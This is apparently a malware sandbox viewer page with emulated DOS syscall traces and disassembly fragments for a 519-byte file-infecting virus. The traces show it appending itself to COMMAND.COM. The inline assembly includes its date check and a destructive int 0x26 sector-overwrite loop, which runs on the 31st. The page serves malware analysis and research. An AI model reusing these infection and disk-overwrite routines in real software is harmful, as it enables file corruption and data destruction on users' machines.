Sample viewer

vx.netlux.org/Virus.DOS.VCC.519

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:35:11.674168477Z	26	PC: 12acb \| Set disk transfer address
2018-12-17T22:35:11.675851766Z	71	PC: 12ada \| Get current directory
2018-12-17T22:35:11.67993936Z	25	PC: 12ade \| Get default drive
2018-12-17T22:35:11.681322437Z	14	PC: 12aec \| Set default drive (Drive = 'C')
2018-12-17T22:35:11.682911125Z	78	PC: 12afe \| Find first file
2018-12-17T22:35:11.689602393Z	47	PC: 12b44 \| Get disk transfer address
2018-12-17T22:35:11.691139433Z	67	PC: 12b4e \| Get or set file attributes
2018-12-17T22:35:12.493930426Z	61	PC: 12b53 \| Open file (Filename = 'COMMAND.COM')
2018-12-17T22:35:12.50288384Z	63	PC: 12b5f \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:35:12.507062511Z	66	PC: 12b68 \| Move file pointer
2018-12-17T22:35:12.508507172Z	44	PC: 12b7d \| Get time 0x12b7d: mov byte ptr [di + 0x11b], dl 0x12b81: call 0x22a8d 0x12b84: mov ax, 0x4200 0x12b87: xor dx, dx 0x12b89: xor cx, cx 0x12b8b: int 0x21 0x12b8d: mov ah, 0x40 0x12b8f: lea dx, word ptr [di + 0x26b] 0x12b93: mov cx, 3 0x12b96: int 0x21 0x12b98: mov ah, 0x3e 0x12b9a: int 0x21 0x12b9c: ret 0x12b9d: mov ah, 0x2a 0x12b9f: int 0x21 0x12ba1: cmp dl, 0x1f 0x12ba4: jne 0x12bbf 0x12ba6: mov ah, 9 0x12ba8: lea dx, word ptr [di + 0x2b1] 0x12bac: int 0x21
2018-12-17T22:35:12.512394458Z	64	PC: 12a9d \| Write file or device (Write 519 bytes on handle 5)
2018-12-17T22:35:12.531364192Z	66	PC: 12b8d \| Move file pointer
2018-12-17T22:35:12.534147665Z	64	PC: 12b98 \| Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:35:12.538598096Z	62	PC: 12b9c \| Close file
2018-12-17T22:35:12.549518943Z	79	PC: 12afe \| Find next file
2018-12-17T22:35:12.554582324Z	59	PC: 12b13 \| Change current directory
2018-12-17T22:35:12.559357901Z	59	PC: 12b1f \| Change current directory
2018-12-17T22:35:12.562908742Z	14	PC: 12b27 \| Set default drive (Drive = 'A')
2018-12-17T22:35:12.564833101Z	26	PC: 12b3e \| Set disk transfer address
2018-12-17T22:35:12.566517013Z	42	PC: 12ba1 \| Get date 0x12ba1: cmp dl, 0x1f 0x12ba4: jne 0x12bbf 0x12ba6: mov ah, 9 0x12ba8: lea dx, word ptr [di + 0x2b1] 0x12bac: int 0x21 0x12bae: mov al, 2 0x12bb0: mov cx, 1 0x12bb3: lea bx, word ptr [bp + 0x2b1] 0x12bb7: cdq 0x12bb8: int 0x26 0x12bba: inc dx 0x12bbb: jae 0x12bb8 0x12bbd: int 0x20 0x12bbf: mov bp, sp 0x12bc1: xor ax, ax 0x12bc3: mov bx, ax 0x12bc5: mov cx, ax 0x12bc7: mov dx, ax 0x12bc9: mov di, ax 0x12bcb: mov si, ax

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":6328,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:59:08.281539703Z	26	PC: 12acb \| Set disk transfer address
2018-12-25T11:59:08.282731923Z	71	PC: 12ada \| Get current directory
2018-12-25T11:59:08.285277252Z	25	PC: 12ade \| Get default drive
2018-12-25T11:59:08.28646165Z	14	PC: 12aec \| Set default drive (Drive = 'C')
2018-12-25T11:59:08.287544418Z	78	PC: 12afe \| Find first file
2018-12-25T11:59:08.292817717Z	47	PC: 12b44 \| Get disk transfer address
2018-12-25T11:59:08.293576724Z	67	PC: 12b4e \| Get or set file attributes
2018-12-25T11:59:09.295956006Z	61	PC: 12b53 \| Open file (Filename = 'COMMAND.COM')
2018-12-25T11:59:09.30246553Z	63	PC: 12b5f \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:59:09.304832734Z	66	PC: 12b68 \| Move file pointer
2018-12-25T11:59:09.306091767Z	44	PC: 12b7d \| Get time 0x12b7d: mov byte ptr [di + 0x11b], dl 0x12b81: call 0x22a8d 0x12b84: mov ax, 0x4200 0x12b87: xor dx, dx 0x12b89: xor cx, cx 0x12b8b: int 0x21 0x12b8d: mov ah, 0x40 0x12b8f: lea dx, word ptr [di + 0x26b] 0x12b93: mov cx, 3 0x12b96: int 0x21 0x12b98: mov ah, 0x3e 0x12b9a: int 0x21 0x12b9c: ret 0x12b9d: mov ah, 0x2a 0x12b9f: int 0x21 0x12ba1: cmp dl, 0x1f 0x12ba4: jne 0x12bbf 0x12ba6: mov ah, 9 0x12ba8: lea dx, word ptr [di + 0x2b1] 0x12bac: int 0x21
2018-12-25T11:59:09.309356425Z	64	PC: 12a9d \| Write file or device (Write 519 bytes on handle 5)
2018-12-25T11:59:09.55710234Z	66	PC: 12b8d \| Move file pointer
2018-12-25T11:59:09.558800846Z	64	PC: 12b98 \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:09.562775778Z	62	PC: 12b9c \| Close file
2018-12-25T11:59:09.569960267Z	79	PC: 12afe \| Find next file (See above)
2018-12-25T11:59:09.572767972Z	59	PC: 12b13 \| Change current directory
2018-12-25T11:59:09.577143281Z	59	PC: 12b1f \| Change current directory
2018-12-25T11:59:09.579515972Z	14	PC: 12b27 \| Set default drive (Drive = 'A')
2018-12-25T11:59:09.581108945Z	26	PC: 12b3e \| Set disk transfer address
2018-12-25T11:59:09.583346066Z	42	PC: 12ba1 \| Get date 0x12ba1: cmp dl, 0x1f 0x12ba4: jne 0x12bbf 0x12ba6: mov ah, 9 0x12ba8: lea dx, word ptr [di + 0x2b1] 0x12bac: int 0x21 0x12bae: mov al, 2 0x12bb0: mov cx, 1 0x12bb3: lea bx, word ptr [bp + 0x2b1] 0x12bb7: cdq 0x12bb8: int 0x26 0x12bba: inc dx 0x12bbb: jae 0x12bb8 0x12bbd: int 0x20 0x12bbf: mov bp, sp 0x12bc1: xor ax, ax 0x12bc3: mov bx, ax 0x12bc5: mov cx, ax 0x12bc7: mov dx, ax 0x12bc9: mov di, ax 0x12bcb: mov si, ax

{"DateBased":true,"Day":31,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":6328,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:59:09.074122492Z	26	PC: 12acb \| Set disk transfer address
2018-12-25T11:59:09.075681107Z	71	PC: 12ada \| Get current directory
2018-12-25T11:59:09.078649332Z	25	PC: 12ade \| Get default drive
2018-12-25T11:59:09.079747361Z	14	PC: 12aec \| Set default drive (Drive = 'C')
2018-12-25T11:59:09.081395202Z	78	PC: 12afe \| Find first file
2018-12-25T11:59:09.086890735Z	47	PC: 12b44 \| Get disk transfer address
2018-12-25T11:59:09.088028515Z	67	PC: 12b4e \| Get or set file attributes
2018-12-25T11:59:09.557962588Z	61	PC: 12b53 \| Open file (Filename = 'COMMAND.COM')
2018-12-25T11:59:09.57074998Z	63	PC: 12b5f \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:59:09.573480306Z	66	PC: 12b68 \| Move file pointer
2018-12-25T11:59:09.575613372Z	44	PC: 12b7d \| Get time 0x12b7d: mov byte ptr [di + 0x11b], dl 0x12b81: call 0x22a8d 0x12b84: mov ax, 0x4200 0x12b87: xor dx, dx 0x12b89: xor cx, cx 0x12b8b: int 0x21 0x12b8d: mov ah, 0x40 0x12b8f: lea dx, word ptr [di + 0x26b] 0x12b93: mov cx, 3 0x12b96: int 0x21 0x12b98: mov ah, 0x3e 0x12b9a: int 0x21 0x12b9c: ret 0x12b9d: mov ah, 0x2a 0x12b9f: int 0x21 0x12ba1: cmp dl, 0x1f 0x12ba4: jne 0x12bbf 0x12ba6: mov ah, 9 0x12ba8: lea dx, word ptr [di + 0x2b1] 0x12bac: int 0x21
2018-12-25T11:59:09.5794704Z	64	PC: 12a9d \| Write file or device (Write 519 bytes on handle 5)
2018-12-25T11:59:09.589209264Z	66	PC: 12b8d \| Move file pointer
2018-12-25T11:59:09.590844361Z	64	PC: 12b98 \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:09.594465038Z	62	PC: 12b9c \| Close file
2018-12-25T11:59:09.602990931Z	79	PC: 12afe \| Find next file (See above)
2018-12-25T11:59:09.606999705Z	59	PC: 12b13 \| Change current directory
2018-12-25T11:59:09.616459359Z	59	PC: 12b1f \| Change current directory
2018-12-25T11:59:09.61829625Z	14	PC: 12b27 \| Set default drive (Drive = 'A')
2018-12-25T11:59:09.619602366Z	26	PC: 12b3e \| Set disk transfer address
2018-12-25T11:59:09.634395458Z	42	PC: 12ba1 \| Get date 0x12ba1: cmp dl, 0x1f 0x12ba4: jne 0x12bbf 0x12ba6: mov ah, 9 0x12ba8: lea dx, word ptr [di + 0x2b1] 0x12bac: int 0x21 0x12bae: mov al, 2 0x12bb0: mov cx, 1 0x12bb3: lea bx, word ptr [bp + 0x2b1] 0x12bb7: cdq 0x12bb8: int 0x26 0x12bba: inc dx 0x12bbb: jae 0x12bb8 0x12bbd: int 0x20 0x12bbf: mov bp, sp 0x12bc1: xor ax, ax 0x12bc3: mov bx, ax 0x12bc5: mov cx, ax 0x12bc7: mov dx, ax 0x12bc9: mov di, ax 0x12bcb: mov si, ax
2018-12-25T11:59:09.637338343Z	9	PC: 12bae \| Display string (String= 'CelTic WarLord^DT YOUR COMPUTER HAS BEEN INFECTED WITH THE MAGIC MUSHROOM VIRUS')